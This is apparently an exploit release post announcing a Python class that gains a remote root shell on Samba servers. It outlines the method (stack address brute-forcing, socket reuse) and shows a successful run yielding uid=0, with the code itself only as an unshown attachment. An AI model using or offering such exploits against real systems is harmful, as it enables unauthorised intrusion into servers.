0day is fragile! One day it's your precious, next day it's worthless ... Anyways, I put together this SAMBAExploit class in Python which might be interesting for folks since it's reusable in many other stuff ... Python because: write once a heap, stack or fmt string exploit class and the rest is just "cp old_exp.py new_exp.py; vi new_exp.py".

The exploit bruteforces all possible stack range and dups the already connected socket for spawning the shell.

Greets to: Michael Teo for pysmb, lsd-pl for linux/findsck shellcode.

- noir

noir@juneof44:/tmp/samba_exp2 > python samba_exp.py 172.17.1.132
[*] brute forcing well known addr range ...
[*] trying; retaddr: 0xbffed404
trying; retaddr: 0xbffed504
trying; retaddr: 0xbffed604
trying; retaddr: 0xbffed704
Linux localhost 2.4.9-e.3 #1 Fri May 3 17:02:43 EDT 2002 i686 unknown
cat /etc/redhat-rel*
Red Hat Linux Advanced Server release 2.1AS (Pensacola)
id
uid=0(root) gid=0(root) groups=99(nobody)
exit
*** Connection closed by remote host ***
Attachment:
samba_exp2.tar.gz
Description: application/gunzip